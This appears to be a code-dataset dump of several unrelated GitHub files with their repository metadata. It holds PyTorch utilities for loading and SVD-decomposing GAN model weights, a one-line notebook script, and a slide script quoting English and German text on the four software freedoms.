instance_id=inst_id,
)
# update instance info dict with type data
instance_info[inst_id]["type_prob"] = instance_type_prob
instance_info[inst_id]["type"] = instance_type
# update instance type map
if type_map is not None:
type_map[instance_map == inst_id] = instance_type
return instance_info, type_map
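# Usage sketch (illustrative only; variable names and shapes are assumptions,
# not part of the documented API): chain the two post-processing transforms
# on the three HoVerNet branch outputs for one image.
#   post_inst = HoVerNetInstanceMapPostProcessing()
#   post_type = HoVerNetNuclearTypePostProcessing()
#   inst_info, inst_map = post_inst(np_pred, hv_pred)              # NP + HV branches
#   inst_info, type_map = post_type(nc_pred, inst_info, inst_map)  # NC branch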
| [
"[email protected]"
]
| |
edd312326d4c73266143456b10802aafd47f2de2 | 637962e1420d3b86005d0e916bafb5578f1537b2 | /gan_training/utils_model_load.py | f32d21c2352efaa1afbea5a78302dfa898252ab1 | []
| no_license | TrendingTechnology/GANmemory_LifelongLearning | aae31ec1f8830232f4c336e559a481a54cf8fe7b | 264f67c0350271e31335f2fd8fd8b8811045322d | refs/heads/main | 2023-03-03T08:25:06.175794 | 2021-02-10T08:29:48 | 2021-02-10T08:29:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 36,896 | py |
import torch
import torch.utils.data
import torch.utils.data.distributed
import torchvision
import torchvision.transforms as transforms
from collections import OrderedDict
def get_parameter_number(net):
total_num = sum(p.numel() for p in net.parameters())
trainable_num = sum(p.numel() for p in net.parameters() if p.requires_grad)
print('Total=', total_num, 'Trainable=', trainable_num, 'fixed=', total_num-trainable_num)
def load_part_model(m_fix, m_ini):
    dict_fix = m_fix.state_dict()  # state_dict(), not state_dic()
    dict_ini = m_ini.state_dict()
dict_fix = {k: v for k, v in dict_fix.items() if k in dict_ini and k.find('embedding')==-1 and k.find('fc') == -1}
dict_ini.update(dict_fix)
m_ini.load_state_dict(dict_ini)
return m_ini
def model_equal_all(model, dict):
model_dict = model.state_dict()
model_dict.update(dict)
model.load_state_dict(model_dict)
return model
def change_model_name(model, pretrained_net_dict):
# pretrained_net_dict = dict
new_state_dict = OrderedDict()
for k, v in pretrained_net_dict.items():
if k.find('AdaFM') >= 0 and k.find('style_gama') >= 0:
indd = k.find('style_gama')
name = k[:indd]+'gamma'
new_state_dict[name] = v.squeeze()
elif k.find('AdaFM') >= 0 and k.find('style_beta') >= 0:
indd = k.find('style_beta')
name = k[:indd]+'beta'
new_state_dict[name] = v.squeeze()
else:
new_state_dict[k] = v
# load params
model.load_state_dict(new_state_dict)
return model
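# Renaming example (hypothetical key, for illustration):
#   'resnet_0_0.AdaFM_0.style_gama' -> 'resnet_0_0.AdaFM_0.gamma' (squeezed)
#   'resnet_0_0.AdaFM_0.style_beta' -> 'resnet_0_0.AdaFM_0.beta'  (squeezed)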
def save_adafm_only(model, is_G=True):
new_state_dict = OrderedDict()
model_dict = model.state_dict()
for k, v in model_dict.items():
if k.find('AdaFM') >= 0:
name = k
new_state_dict[name] = v
if is_G==False:
if k.find('fc') >= 0:
name = k
new_state_dict[name] = v
return new_state_dict
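# Usage sketch (assumes `generator` / `discriminator` are AdaFM-based models):
#   torch.save(save_adafm_only(generator), 'G_adafm_task1.pth')
#   torch.save(save_adafm_only(discriminator, is_G=False), 'D_adafm_task1.pth')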
def model_equal_part(model, dict_all):
model_dict = model.state_dict()
dict_fix = {k: v for k, v in dict_all.items() if k in model_dict and k.find('embedding') == -1 and k.find('fc') == -1}
model_dict.update(dict_fix)
model.load_state_dict(model_dict)
return model
def model_equal_part_embed(model, dict_all):
model_dict = model.state_dict()
dict_fix = {k: v for k, v in dict_all.items() if k in model_dict and k.find('embedding') == -1}
model_dict.update(dict_fix)
model.load_state_dict(model_dict)
return model
def model_equal_embeding(model, dict_all):
model_dict = model.state_dict()
dict_fix = {k: v for k, v in dict_all.items() if k in model_dict and k.find('embedding') == -1 and k.find('fc') == -1}
model_dict.update(dict_fix)
for k, v in dict_all.items():
if k.find('fc') >= 0 and k.find('weight') >=0:
name = k
model_dict[name][:,:257] = v
model.load_state_dict(model_dict)
return model
def model_load_interplation(generator, dict_G_1, dict_G_2, lamdd=0.0, block=None):
    """Linearly interpolate two generator state dicts.

    block == 9 interpolates every parameter; block in 0..6 interpolates only
    the matching `resnet_<block>_0` stage and copies the rest from dict_G_1.
    """
    model_dict = generator.state_dict()
    for k, v in dict_G_1.items():
        if block == 9:
            model_dict[k] = (1 - lamdd) * dict_G_1[k] + lamdd * dict_G_2[k]
        elif block in range(7):
            if k.find('resnet_%d_0' % block) >= 0:
                model_dict[k] = (1 - lamdd) * dict_G_1[k] + lamdd * dict_G_2[k]
            else:
                model_dict[k] = dict_G_1[k]
    generator.load_state_dict(model_dict)
    return generator
def model_load_choose_para(generator, dict_G_1, para=None):
model_dict = generator.state_dict()
for k, v in dict_G_1.items():
if para == None:
model_dict[k] = dict_G_1[k]
elif para==0:
if k.find('style_gama')>=0 or (k.find('AdaFM_fc.gamma')>=0):
model_dict[k] = dict_G_1[k]
print(k)
elif para==1:
if k.find('style_beta')>=0 or (k.find('AdaFM_fc.beta')>=0):
model_dict[k] = dict_G_1[k]
print(k)
elif para==2:
if k.find('AdaFM_b')>=0 or k.find('AdaFM_fc_b')>=0:
model_dict[k] = dict_G_1[k]
print(k)
generator.load_state_dict(model_dict)
return generator
def model_load_choose_layer(generator, dict_G_1, Layerr=None):
model_dict = generator.state_dict()
for k, v in dict_G_1.items():
if Layerr == None:
model_dict[k] = dict_G_1[k]
else:
if k.find(Layerr) >= 0 and (k.find('AdaFM') >= 0):
model_dict[k] = dict_G_1[k]
print(k)
generator.load_state_dict(model_dict)
return generator
def model_load_donot_choose_para(generator, dict_G_1, para=None):
model_dict = generator.state_dict()
for k, v in dict_G_1.items():
if para == None:
model_dict[k] = dict_G_1[k]
elif para==0:
if k.find('style_gama')==-1 and k.find('AdaFM_fc.gamma')==-1:
model_dict[k] = dict_G_1[k]
elif para==1:
if k.find('style_beta')==-1 and k.find('AdaFM_fc.beta')==-1:
model_dict[k] = dict_G_1[k]
elif para==2:
if k.find('AdaFM_b')==-1 and k.find('AdaFM_fc_b')==-1:
model_dict[k] = dict_G_1[k]
generator.load_state_dict(model_dict)
return generator
def out_bias_to_in_bias(model, dict_all):
model_dict = model.state_dict()
dict_fix = {k: v for k, v in dict_all.items() if
k in model_dict and k.find('AdaFM_fc_b') == -1 and k.find('AdaFM_b0') == -1 and k.find('AdaFM_b1') == -1}
for k, v in dict_all.items():
ind = k.find('AdaFM_fc_b')
if ind >= 0:
dict_fix[k[:ind] + 'AdaFM_fc.b'] = v
ind = k.find('AdaFM_b0')
if ind >= 0:
dict_fix[k[:ind] + 'AdaFM_0.b'] = v
ind = k.find('AdaFM_b1')
if ind >= 0:
dict_fix[k[:ind] + 'AdaFM_1.b'] = v
model_dict.update(dict_fix)
model.load_state_dict(model_dict)
return model
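# Renaming example (illustrative): keys ending in 'AdaFM_fc_b', 'AdaFM_b0' and
# 'AdaFM_b1' become '...AdaFM_fc.b', '...AdaFM_0.b' and '...AdaFM_1.b',
# moving the extra out-of-module bias tensors into the AdaFM modules.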
def model_equal_classCondition(model, dict_all):
model_dict = model.state_dict()
dict_fix = {k: v for k, v in dict_all.items() if k in model_dict and k.find('embedding') == -1 and k.find('fc') == -1}
model_dict.update(dict_fix)
for k, v in dict_all.items():
if k.find('fc') >= 0 and k.find('weight') >=0:
name = k
model_dict[name] = v * 0.0
model_dict[name][:,:257] = v
model.load_state_dict(model_dict)
return model
def model_equal_CelebA(model, dict_all, dim_z=-1, dim_h=-1):
model_dict = model.state_dict()
dict_fix = {k: v for k, v in dict_all.items() if
k in model_dict and k.find('embedding') == -1}
for k, v in dict_all.items():
if k.find('fc') >=0 and k.find('weight') >=0:
if dim_z >= 0 and dim_h >= 0:
dict_fix[k] = v[:dim_h, :dim_z]
elif dim_z >= 0:
dict_fix[k] = v[:, :dim_z]
if dim_h >= 0:
if k.find('fc') >=0 and k.find('bias') >=0:
dict_fix[k] = v[:dim_h]
model_dict.update(dict_fix)
model.load_state_dict(model_dict)
return model
def model_equal_SVD(model, dict_all, FRAC=0.9):
model_dict = model.state_dict()
# FRAC = 0.9
for k, v in dict_all.items():
if k.find('AdaFM') >= 0 and k.find('style_gama') >= 0:
# print('shape of FC:', v.shape)
Ua, Sa, Va = (v-1.).squeeze().svd()
if Ua.shape[0] >= 512:
FRAC = 0.6
else:
FRAC = 0.9
ii, jj = Sa.abs().sort(descending=True)
ii_acsum = ii.cumsum(dim=0)
NUM = (1 - (ii_acsum / ii_acsum[-1] >= FRAC)).sum() + 1
v_new = 1. + (Ua[:, :NUM] * Sa[:NUM].unsqueeze(0)).mm(Va[:, :NUM].t())
dict_all[k] = v_new.unsqueeze(2).unsqueeze(3)
elif k.find('AdaFM') >= 0 and k.find('style_beta') >= 0:
Ua, Sa, Va = v.squeeze().svd()
if Ua.shape[0] >= 512:
FRAC = 0.6
else:
FRAC = 0.9
ii, jj = Sa.abs().sort(descending=True)
ii_acsum = ii.cumsum(dim=0)
NUM = (1 - (ii_acsum / ii_acsum[-1] >= FRAC)).sum() + 1
v_new = (Ua[:, :NUM] * Sa[:NUM].unsqueeze(0)).mm(Va[:, :NUM].t())
dict_all[k] = v_new.unsqueeze(2).unsqueeze(3)
model_dict.update(dict_all)
model.load_state_dict(model_dict)
return model
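# Illustration of the rank selection above (assumed values): for singular
# values Sa = [4, 3, 2, 1] the normalized cumulative sums are
# [0.4, 0.7, 0.9, 1.0]; with FRAC = 0.9 the test `>= FRAC` first holds at
# index 2, so NUM = 2 + 1 = 3 components are kept.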
def model_equal_SVD_v2(model, dict_all, task_id=-1, NUM=200, dim_z=-1):
    model_dict = model.state_dict()
    dict_fix = {k: v for k, v in dict_all.items() if
                k in model_dict and k.find('AdaFM_0') == -1 and k.find('AdaFM_1') == -1}
    if dim_z >= 0:
        for k, v in dict_all.items():
            if k.find('fc') >= 0 and k.find('weight') >= 0:
                # print('shape of FC:', v.shape)
                dict_fix[k] = v[:, :dim_z]
    model_dict.update(dict_fix)
    pecen = 1./2.
    genh, S_rep = 2., 'abs'
    # genh, S_rep = 2., 'exp'
    # decompose every AdaFM style tensor into rank-NUM factors (U, S, V)
    for k, v in dict_all.items():
        for adafm in ('AdaFM_0', 'AdaFM_1'):
            ind = k.find(adafm)
            if ind < 0:
                continue
            if k.find('style_gama') >= 0:
                prefix = k[:ind + 7] + '.gamma'
            elif k.find('style_beta') >= 0:
                prefix = k[:ind + 7] + '.beta'
            else:
                continue
            Ua, Sa, Va = v.squeeze().svd()
            model_dict[prefix + '_u'] = Ua[:, :NUM]
            model_dict[prefix + '_v'] = Va[:, :NUM]
            if task_id >= 1:
                # shrink the singular values for later tasks, under the chosen
                # reparameterization of S
                if S_rep == 'abs':
                    model_dict[prefix + '_s2'] = Sa[:NUM] * pecen
                elif S_rep == 'x2':
                    model_dict[prefix + '_s2'] = (Sa[:NUM] * pecen).pow(1. / genh)
                elif S_rep == 'exp':
                    model_dict[prefix + '_s2'] = (Sa[:NUM] * pecen).log()
            else:
                model_dict[prefix + '_s2'] = Sa[:NUM]
    model.load_state_dict(model_dict)
    return model
def model_equal_SVD_fenkai(model, dict_all, NUM1=100, NUM2=50):
model_dict = model.state_dict()
for k, v in dict_all.items():
if k.find('AdaFM') >= 0 and k.find('style_gama') >= 0:
Ua, Sa, Va = v.squeeze().svd()
print('shape of FC:', NUM1)
v_new = torch.mm(torch.mm(Ua[:, :NUM1], torch.diag(Sa[:NUM1])), Va[:, :NUM1].t())
dict_all[k] = v_new.unsqueeze(2).unsqueeze(3)
if k.find('AdaFM') >= 0 and k.find('style_beta') >= 0:
Ua, Sa, Va = v.squeeze().svd()
print('shape of FC:', NUM2)
v_new = torch.mm(torch.mm(Ua[:, :NUM2], torch.diag(Sa[:NUM2])), Va[:, :NUM2].t())
dict_all[k] = v_new.unsqueeze(2).unsqueeze(3)
model_dict.update(dict_all)
model.load_state_dict(model_dict)
return model
transform = transforms.Compose([
transforms.Resize(32),
transforms.CenterCrop(32),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
transforms.Lambda(lambda x: x + 1./128 * torch.rand(x.size())),
])
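# Usage sketch (CIFAR-10 chosen only as an example dataset):
#   dataset = torchvision.datasets.CIFAR10(root='./data', download=True, transform=transform)
#   loader = torch.utils.data.DataLoader(dataset, batch_size=64, shuffle=True)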
def svd_all_layers(dict_G, FRAC=0.9):
flower_gamma_U, flower_gamma_S, flower_gamma_V = [], [], []
flower_beta_U, flower_beta_S, flower_beta_V = [], [], []
for k, v in dict_G.items():
if k.find('AdaFM') >= 0 and k.find('style_gama') >= 0:
# print('shape of FC:', v.shape)
Ua, Sa, Va = (v - 1.).squeeze().svd()
ii, jj = Sa.abs().sort(descending=True)
ii_acsum = ii.cumsum(dim=0)
NUM = (1 - (ii_acsum / ii_acsum[-1] >= FRAC)).sum() + 1
flower_gamma_U.append(Ua[:, :NUM])
flower_gamma_S.append(Sa[:NUM])
flower_gamma_V.append(Va[:, :NUM])
elif k.find('AdaFM') >= 0 and k.find('style_beta') >= 0:
Ua, Sa, Va = v.squeeze().svd()
ii, jj = Sa.abs().sort(descending=True)
ii_acsum = ii.cumsum(dim=0)
NUM = (1 - (ii_acsum / ii_acsum[-1] >= FRAC)).sum() + 1
flower_beta_U.append(Ua[:, :NUM])
flower_beta_S.append(Sa[:NUM])
flower_beta_V.append(Va[:, :NUM])
return flower_gamma_U, flower_gamma_S, flower_gamma_V, flower_beta_U, flower_beta_S, flower_beta_V
def gamma_beta_all_layers(dict_G):
flower_gamma = []
flower_beta = []
for k, v in dict_G.items():
if k.find('AdaFM') >= 0 and k.find('style_gama') >= 0:
# print('shape of FC:', v.shape)
flower_gamma.append(v.squeeze())
elif k.find('AdaFM') >= 0 and k.find('style_beta') >= 0:
flower_beta.append(v.squeeze())
return flower_gamma, flower_beta
def cumpute_atc_num(generator_test, para='gamma', task=0, num_task=6):
    # number of stored singular components per AdaFM layer for a given task
    num_task = num_task - 1
    blocks = [generator_test.resnet_0_0, generator_test.resnet_1_0,
              generator_test.resnet_2_0, generator_test.resnet_3_0,
              generator_test.resnet_4_0, generator_test.resnet_5_0,
              generator_test.resnet_6_0]
    act_gamma_t1 = []
    for block in blocks:
        for adafm in (block.AdaFM_0, block.AdaFM_1):
            if para == 'gamma':
                act_gamma_t1.append(adafm.global_gamma_s[num_task][task].shape[0])
            elif para == 'beta':
                act_gamma_t1.append(adafm.global_beta_s[num_task][task].shape[0])
    return act_gamma_t1
def cumpute_atc_num_v2(generator_test, para='gamma', task=0, num_task=6):
    num_task = num_task - 1
    blocks = [generator_test.resnet_0_0, generator_test.resnet_1_0,
              generator_test.resnet_2_0, generator_test.resnet_3_0,
              generator_test.resnet_4_0, generator_test.resnet_5_0,
              generator_test.resnet_6_0]
    act_gamma_t1 = []
    for block in blocks:
        for adafm in (block.AdaFM_0, block.AdaFM_1):
            if para == 'gamma':
                act_gamma_t1.append(adafm.global_num_gamma[task].cpu().data)
            elif para == 'beta':
                act_gamma_t1.append(adafm.global_num_beta[task].cpu().data)
    return act_gamma_t1
def get_parameter_num(model, task_id=0):
    # total task-specific parameter count: fc style params plus, per AdaFM
    # layer, the low-rank factors (U, S, V for gamma and beta) and the bias
    p_num = 0
    p_num += model.AdaFM_fc.gamma.shape[1] + model.AdaFM_fc.beta.shape[1] + model.AdaFM_fc.b.shape[0]
    blocks = [model.resnet_0_0, model.resnet_1_0, model.resnet_2_0,
              model.resnet_3_0, model.resnet_4_0, model.resnet_5_0,
              model.resnet_6_0]
    for block in blocks:
        for adafm in (block.AdaFM_0, block.AdaFM_1):
            h1 = adafm.global_gamma_u[0].shape[0]
            w1 = adafm.global_num_gamma[task_id].cpu().data
            h2 = adafm.global_beta_u[0].shape[0]
            w2 = adafm.global_num_beta[task_id].cpu().data
            c = adafm.b.shape[0]
            p_num += 2*h1*w1 + w1 + 2*h2*w2 + w2 + c
    return p_num
def load_model_norm(model, is_G=True, is_classCondition=False):
th_m = torch.tensor(1e-5)
stdd = 1.0
dict_all = model.state_dict()
model_dict = model.state_dict()
for k, v in dict_all.items():
if is_G==True:
if k.find('fc.weight') >= 0:
w_mu = v.mean([1], keepdim=True)
w_std = v.std([1], keepdim=True) * stdd
dict_all[k].data = (v - w_mu)/(w_std)
dict_all['AdaFM_fc.gamma'].data = w_std.data.t()
dict_all['AdaFM_fc.beta'].data = w_mu.data.t()
idt = k.find('conv_0.weight')
if idt >= 0:
w_mu = v.mean([2,3], keepdim=True)
w_std = v.std([2,3], keepdim=True) * stdd
dict_all[k].data = (v - w_mu)/(w_std)
dict_all[k[:idt]+'AdaFM_0.style_gama'].data = w_std.data
dict_all[k[:idt]+'AdaFM_0.style_beta'].data = w_mu.data
idt = k.find('conv_1.weight')
if idt >= 0:
w_mu = v.mean([2, 3], keepdim=True)
w_std = v.std([2, 3], keepdim=True) * stdd
dict_all[k].data = (v - w_mu)/(w_std)
dict_all[k[:idt] + 'AdaFM_1.style_gama'].data = w_std.data
dict_all[k[:idt] + 'AdaFM_1.style_beta'].data = w_mu.data
if is_classCondition:
if k.find('AdaFM_class_bias.weight') >= 0:
dict_all[k].data = v*0.0
model_dict.update(dict_all)
model.load_state_dict(model_dict)
return model
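# Intent illustration (an assumption about the design, stated as comments):
# each conv weight slice W[o, i, :, :] is rewritten as W = std * W_hat + mu,
# with W_hat zero-mean / unit-std over the kernel's spatial dims; the
# per-(o, i) std and mu go into the matching AdaFM style_gama / style_beta so
# later tasks can adapt the style while the normalized kernel stays shared.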
def load_model_norm_svd(model, is_G=True, is_first_task=True):
# for the first task
dict_all = model.state_dict()
model_dict = model.state_dict()
for k, v in dict_all.items():
if is_G == True:
if k.find('fc.weight') >= 0:
w_mu = v.mean([1], keepdim=True)
w_std = v.std([1], keepdim=True)
dict_all[k].data = (v - w_mu) / (w_std)
dict_all['AdaFM_fc.gamma'].data = w_std.data.t()
dict_all['AdaFM_fc.beta'].data = w_mu.data.t()
idt = k.find('conv_0.weight')
if idt >= 0:
w_mu = v.mean([2, 3], keepdim=True)
w_std = v.std([2, 3], keepdim=True)
dict_all[k].data = (v - w_mu) / (w_std)
real_rank = howMny_componetes(v.shape[0])
# gamma
Ua, Sa, Va = w_std.data.squeeze().svd()
ii, jj = Sa.abs().sort(descending=True)
dict_all[k[:idt] + 'AdaFM_0.gamma_u'].data = Ua[:, jj[:real_rank]].data
dict_all[k[:idt] + 'AdaFM_0.gamma_v'].data = Va[:, jj[:real_rank]].data
if is_first_task:
dict_all[k[:idt] + 'AdaFM_0.gamma_s2'].data = Sa[jj[:real_rank]].data
Ua, Sa, Va = w_mu.data.squeeze().svd()
ii, jj = Sa.abs().sort(descending=True)
dict_all[k[:idt] + 'AdaFM_0.beta_u'].data = Ua[:, jj[:real_rank]].data
dict_all[k[:idt] + 'AdaFM_0.beta_v'].data = Va[:, jj[:real_rank]].data
if is_first_task:
dict_all[k[:idt] + 'AdaFM_0.beta_s2'].data = Sa[jj[:real_rank]].data
idt = k.find('conv_1.weight')
if idt >= 0:
w_mu = v.mean([2, 3], keepdim=True)
w_std = v.std([2, 3], keepdim=True)
dict_all[k].data = (v - w_mu) / (w_std)
real_rank = howMny_componetes(v.shape[0])
# gamma
Ua, Sa, Va = w_std.data.squeeze().svd()
ii, jj = Sa.abs().sort(descending=True)
dict_all[k[:idt] + 'AdaFM_1.gamma_u'].data = Ua[:, jj[:real_rank]].data
dict_all[k[:idt] + 'AdaFM_1.gamma_v'].data = Va[:, jj[:real_rank]].data
if is_first_task:
dict_all[k[:idt] + 'AdaFM_1.gamma_s2'].data = Sa[jj[:real_rank]].data
Ua, Sa, Va = w_mu.data.squeeze().svd()
ii, jj = Sa.abs().sort(descending=True)
dict_all[k[:idt] + 'AdaFM_1.beta_u'].data = Ua[:, jj[:real_rank]].data
dict_all[k[:idt] + 'AdaFM_1.beta_v'].data = Va[:, jj[:real_rank]].data
if is_first_task:
dict_all[k[:idt] + 'AdaFM_1.beta_s2'].data = Sa[jj[:real_rank]].data
model_dict.update(dict_all)
model.load_state_dict(model_dict)
return model
def load_model_norm_svd_S100(model, is_G=True, is_first_task=True):
# for the first task
S_scale_g, S_scale_b = 100.0, 20.0
dict_all = model.state_dict()
model_dict = model.state_dict()
for k, v in dict_all.items():
if is_G == True:
if k.find('fc.weight') >= 0:
w_mu = v.mean([1], keepdim=True)
w_std = v.std([1], keepdim=True)
dict_all[k].data = (v - w_mu) / (w_std)
dict_all['AdaFM_fc.gamma'].data = w_std.data.t()
dict_all['AdaFM_fc.beta'].data = w_mu.data.t()
idt = k.find('conv_0.weight')
if idt >= 0:
w_mu = v.mean([2, 3], keepdim=True)
w_std = v.std([2, 3], keepdim=True)
dict_all[k].data = (v - w_mu) / (w_std)
real_rank = howMny_componetes(v.shape[0])
# gamma
Ua, Sa, Va = w_std.data.squeeze().svd()
ii, jj = Sa.abs().sort(descending=True)
dict_all[k[:idt] + 'AdaFM_0.gamma_u'].data = Ua[:, jj[:real_rank]].data
dict_all[k[:idt] + 'AdaFM_0.gamma_v'].data = Va[:, jj[:real_rank]].data
if is_first_task:
dict_all[k[:idt] + 'AdaFM_0.gamma_s2'].data = Sa[jj[:real_rank]].data / S_scale_g
Ua, Sa, Va = w_mu.data.squeeze().svd()
ii, jj = Sa.abs().sort(descending=True)
dict_all[k[:idt] + 'AdaFM_0.beta_u'].data = Ua[:, jj[:real_rank]].data
dict_all[k[:idt] + 'AdaFM_0.beta_v'].data = Va[:, jj[:real_rank]].data
if is_first_task:
dict_all[k[:idt] + 'AdaFM_0.beta_s2'].data = Sa[jj[:real_rank]].data / S_scale_b
idt = k.find('conv_1.weight')
if idt >= 0:
w_mu = v.mean([2, 3], keepdim=True)
w_std = v.std([2, 3], keepdim=True)
dict_all[k].data = (v - w_mu) / (w_std)
real_rank = howMny_componetes(v.shape[0])
# gamma
Ua, Sa, Va = w_std.data.squeeze().svd()
ii, jj = Sa.abs().sort(descending=True)
dict_all[k[:idt] + 'AdaFM_1.gamma_u'].data = Ua[:, jj[:real_rank]].data
dict_all[k[:idt] + 'AdaFM_1.gamma_v'].data = Va[:, jj[:real_rank]].data
if is_first_task:
dict_all[k[:idt] + 'AdaFM_1.gamma_s2'].data = Sa[jj[:real_rank]].data / S_scale_g
Ua, Sa, Va = w_mu.data.squeeze().svd()
ii, jj = Sa.abs().sort(descending=True)
dict_all[k[:idt] + 'AdaFM_1.beta_u'].data = Ua[:, jj[:real_rank]].data
dict_all[k[:idt] + 'AdaFM_1.beta_v'].data = Va[:, jj[:real_rank]].data
if is_first_task:
dict_all[k[:idt] + 'AdaFM_1.beta_s2'].data = Sa[jj[:real_rank]].data / S_scale_b
model_dict.update(dict_all)
model.load_state_dict(model_dict)
return model
def load_model_norm_svd_AR(model, dict_all, is_G=True, is_first_task=True):
# for the first task
model_dict = model.state_dict()
dic_choose = {k: v for k, v in dict_all.items() if
k in model_dict and (k.find('AdaFM_0') == -1 or k.find('AdaFM_1') == -1)}
for k, v in dict_all.items():
if k in model_dict:
model_dict[k].data = v.data
idt = k.find('conv_0.weight')
if idt >= 0:
real_rank = howMny_componetes(v.shape[0])
# gamma
Ua, Sa, Va = dict_all[k[:idt] + 'AdaFM_0.style_gama'].data.squeeze().svd()
ii, jj = Sa.abs().sort(descending=True)
model_dict[k[:idt] + 'AdaFM_0.gamma_u'].data = Ua[:, jj[:real_rank]].data
model_dict[k[:idt] + 'AdaFM_0.gamma_v'].data = Va[:, jj[:real_rank]].data
if is_first_task:
model_dict[k[:idt] + 'AdaFM_0.gamma_s2'].data = Sa[jj[:real_rank]].data
Ua, Sa, Va = dict_all[k[:idt] + 'AdaFM_0.style_beta'].data.squeeze().svd()
ii, jj = Sa.abs().sort(descending=True)
model_dict[k[:idt] + 'AdaFM_0.beta_u'].data = Ua[:, jj[:real_rank]].data
model_dict[k[:idt] + 'AdaFM_0.beta_v'].data = Va[:, jj[:real_rank]].data
if is_first_task:
model_dict[k[:idt] + 'AdaFM_0.beta_s2'].data = Sa[jj[:real_rank]].data
idt = k.find('conv_1.weight')
if idt >= 0:
real_rank = howMny_componetes(v.shape[0])
# gamma
Ua, Sa, Va = dict_all[k[:idt] + 'AdaFM_1.style_gama'].data.squeeze().svd()
ii, jj = Sa.abs().sort(descending=True)
model_dict[k[:idt] + 'AdaFM_1.gamma_u'].data = Ua[:, jj[:real_rank]].data
model_dict[k[:idt] + 'AdaFM_1.gamma_v'].data = Va[:, jj[:real_rank]].data
if is_first_task:
model_dict[k[:idt] + 'AdaFM_1.gamma_s2'].data = Sa[jj[:real_rank]].data
Ua, Sa, Va = dict_all[k[:idt] + 'AdaFM_1.style_beta'].data.squeeze().svd()
ii, jj = Sa.abs().sort(descending=True)
model_dict[k[:idt] + 'AdaFM_1.beta_u'].data = Ua[:, jj[:real_rank]].data
model_dict[k[:idt] + 'AdaFM_1.beta_v'].data = Va[:, jj[:real_rank]].data
if is_first_task:
model_dict[k[:idt] + 'AdaFM_1.beta_s2'].data = Sa[jj[:real_rank]].data
# model_dict.update(dict_all)
model.load_state_dict(model_dict)
return model
def chanel_percent(ch, p=[0.95, 0.9, 0.9, 0.8, 0.7]):
if ch == 64:
FRAC = p[0] #0.95
elif ch == 128:
FRAC = p[1] #0.9
elif ch==256:
FRAC = p[2] #0.9
elif ch == 512:
FRAC = p[3] #0.8
elif ch >= 1024:
FRAC = p[4] #0.7
return FRAC
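# Example (with the default p): chanel_percent(512) returns 0.8, i.e. keep
# roughly 80% of the singular-value energy for 512-channel layers.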
def howMny_componetes(ch, is_beta=False, Def=[64, 128, 256, 512, 1024]):
    #Def = [30, 50, 100, 200, 400]
    # gamma and beta share the same lookup; only the top bucket differs
    # (beta matches ch == 1024 exactly, gamma matches any ch >= 1024)
    if ch == 64:
        FRAC = Def[0]
    elif ch == 128:
        FRAC = Def[1]
    elif ch == 256:
        FRAC = Def[2]
    elif ch == 512:
        FRAC = Def[3]
    elif ch == 1024 or (not is_beta and ch > 1024):
        FRAC = Def[4]
    return FRAC
def my_copy(x):
return x.detach().data * 1.0
| [
"[email protected]"
]
| |
4c8f7e6ae2aeddd5c42226129d42c4cb4aab080a | 3ab599127dc2fc89cfee5f3ee3a91168499cb475 | /tests/notebooks/print.py | f53c6110196004fd9f0397077b033b4cca94f792 | [
"BSD-3-Clause"
]
| permissive | maartenbreddels/voila | 17dfb39c131ffad4b3b51926214dc71a2e06a964 | d3a52abdd34b68bdabdd8f0ae34071711cd16742 | refs/heads/master | 2022-05-11T05:47:44.843627 | 2020-09-28T09:58:37 | 2020-09-28T09:58:37 | 149,579,689 | 2 | 1 | NOASSERTION | 2020-05-27T07:59:20 | 2018-09-20T08:50:19 | Python | UTF-8 | Python | false | false | 284 | py | # ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.2.1
# kernelspec:
# display_name: Python 3
# language: python
# name: python
# ---
print('Hi Voilà!')
| [
"[email protected]"
]
| |
bb3d8a5f150df51b5fdef25b495d0d2462c6e144 | aae0461973440174afbf8e75e4ddf0f0c4dd1a9c | /gnu/gnu_slides.py | 1a30f50a3ee380b604a8669eeb4d4ef8b8b97991 | []
| no_license | behdad/slippy | f81eeac68df39eb0f6a7465effacd7239eb24cbf | 5535fe88a785dd75c96171b989f310fcd80e479e | refs/heads/master | 2023-08-29T08:48:40.919688 | 2016-09-27T08:02:01 | 2016-09-27T08:02:01 | 15,673,169 | 20 | 0 | null | 2014-01-10T08:09:47 | 2014-01-06T12:14:35 | Python | UTF-8 | Python | false | false | 5,180 | py | #!/usr/bin/python
# -*- coding:utf8 -*-
slides = []
def slide_add(f, data=None, width=800, height=400):
slides.append ((f, data, width, height))
return f
import pango
def text_slide (l):
def s (r):
for i in l:
yield i
for i in range (30):
yield ''
slide_add (s, data={'align': pango.ALIGN_LEFT})
texts = {}
texts['en'] = """“Free software” is a matter of liberty, not price. To understand the
concept, you should think of “free” as in “free speech”, not as in “free beer.”
Free software is a matter of the users' freedom to run, copy,
distribute, study, change and improve the software.
More precisely, it refers to four kinds of freedom, for the users of the
software:
------------------------------------------------------------------------------
0. The freedom to run the program, for any purpose.
1. The freedom to study how the program works, and adapt it to your needs.
Access to the source code is a precondition for this.
2. The freedom to redistribute copies so you can help your neighbor.
3. The freedom to improve the program, and release your improvements to
the public, so that the whole community benefits.
Access to the source code is a precondition for this.
------------------------------------------------------------------------------
The concept of these 4 freedoms (0-3) were developed by Richard Stallman.
To set a good example he started to write a completely free operating system.
Today Linux based GNU systems are used by millions of people around the world."""
texts['de'] = """Bei dem Begriff „Freie Software“ geht es um Freiheit, nicht um den Preis.
Um dieses Konzept richtig begreifen zu können, sollte man an „frei“ wie in
„freie Rede“ denken, und nicht an „Freibier“.
Bei „Freier Software“ geht es um die Freiheit des Benutzers die Software nach
Belieben zu benutzen, zu kopieren, weiter zu geben, die Software zu studieren,
sowie Änderungen und Verbesserungen an der Software vornehmen zu können.
------------------------------------------------------------------------------
Genauer gesagt, bezieht sich der Begriff „Freie Software“ auf vier Arten von
Freiheit, die der Benutzer der Software hat:
0. Die Freiheit, das Programm für jeden Zweck zu benutzen.
1. Die Freiheit, zu verstehen, wie das Programm funktioniert und wie man es
für seine Ansprüche anpassen kann.
Der Zugang zum Quellcode ist dafür Voraussetzung.
------------------------------------------------------------------------------
2. Die Freiheit, Kopien weiterzuverbreiten, so dass man seinem Nächsten
weiterhelfen kann.
3. Die Freiheit, das Programm zu verbessern und die Verbesserungen der
Allgemeinheit zur Verfügung zu stellen, damit die ganze Gemeinschaft davon
profitieren kann.
Der Zugang zum Quellcode ist dafür Voraussetzung.
